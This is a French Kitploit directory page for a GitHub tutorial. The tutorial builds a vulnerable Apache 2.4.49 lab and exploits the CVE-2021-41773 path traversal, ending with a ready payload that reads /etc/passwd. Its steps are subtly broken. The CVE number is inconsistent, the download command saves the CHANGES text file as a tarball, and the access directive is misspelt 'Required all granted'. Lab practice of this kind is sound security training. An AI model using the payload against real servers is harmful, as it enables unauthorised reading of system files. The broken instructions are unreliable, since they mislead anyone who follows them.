Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-4773 — Tutoriel pas à pas montrant comment configurer un environnement Apache 2.4.49 vulnérable et exploiter le traversement de chemin CVE-2021-41773 à l'aide de machines virtuelles Kali Linux et Ubuntu Server. | Kitploit
Outils/GitHubGitHub/alexs18/cve-2021-4773
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubalexs18/cve-2021-4773

CVE-2021-4773

Tutoriel pas à pas montrant comment configurer un environnement Apache 2.4.49 vulnérable et exploiter le traversement de chemin CVE-2021-41773 à l'aide de machines virtuelles Kali Linux et Ubuntu Server.

Voir le dépôt
3il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-4773

ceci est un exemple pratique de la manière d'exploiter la vulnérabilité CVE-2021-4773 avec une machine virtuelle

pour ce tutoriel, vous avez besoin des éléments suivants

  • machine virtuelle comme kali linux
  • machine virtuelle comme ubuntu server
  • installer apache version 2.4.49

alors commençons quand vous avez 2 machines virtuelles en cours d'exécution, vous allez installer apache version 2.4.49 avec une archive de dépôt vous pouvez trouver cette version ici https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Installer et configurer la version vulnérable sur ubuntu server

1 la première fois sur votre machine virtuelle serveur, vous devez exécuter la commande suivante

curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  ou wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 la deuxième fois, vous devez décompresser cette version d'apache comme ceci

tar -xvjf httpd-2.4.49.tar.bz2

3 installer les paquets suivants

sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 exécuter le fichier exécutable dans le répertoire principal (nom du fichier configure) en utilisant le flag pour spécifier le répertoire d'installation

./configure --prefix=/usr/local/apache2

5 compiler la version vulnérable

make

6 installer la version vulnérable

make install

7 vérifier la version

ls /usr/local/apache2

8 démarrer le processus

/usr/local/apache2/bin/apachectl start
  

9 vérifier le processus

ps aux | grep httpd

10 configurer la vulnérabilité trouver le fichier /usr/local/apache2/conf/httpd.conf et configurer le répertoire admin trouver la balise directory et remplacer Require all denied par

  Required all granted
  

trouver la balise Files .ht* et remplacer Require all denied par

  Required all granted

le premier changement permet l'exploitation de la vulnérabilité dans l'environnement local et le second l'exposition dans l'environnement réel

Exploiter la vulnérabilité sur kali linux

1 scanner l'adresse IP avec nmap avec la commande suivante

nmap -sV ip_address

2 faire un curl ou wget pour tester le serveur apache

curl ip_address ou faire wget ip_address

3 voir comment exploiter la vulnérabilité sur la page suivante si vous voulez comprendre la syntaxe

https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

ou utilisez simplement la payload suivante

http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Télécharger l’outil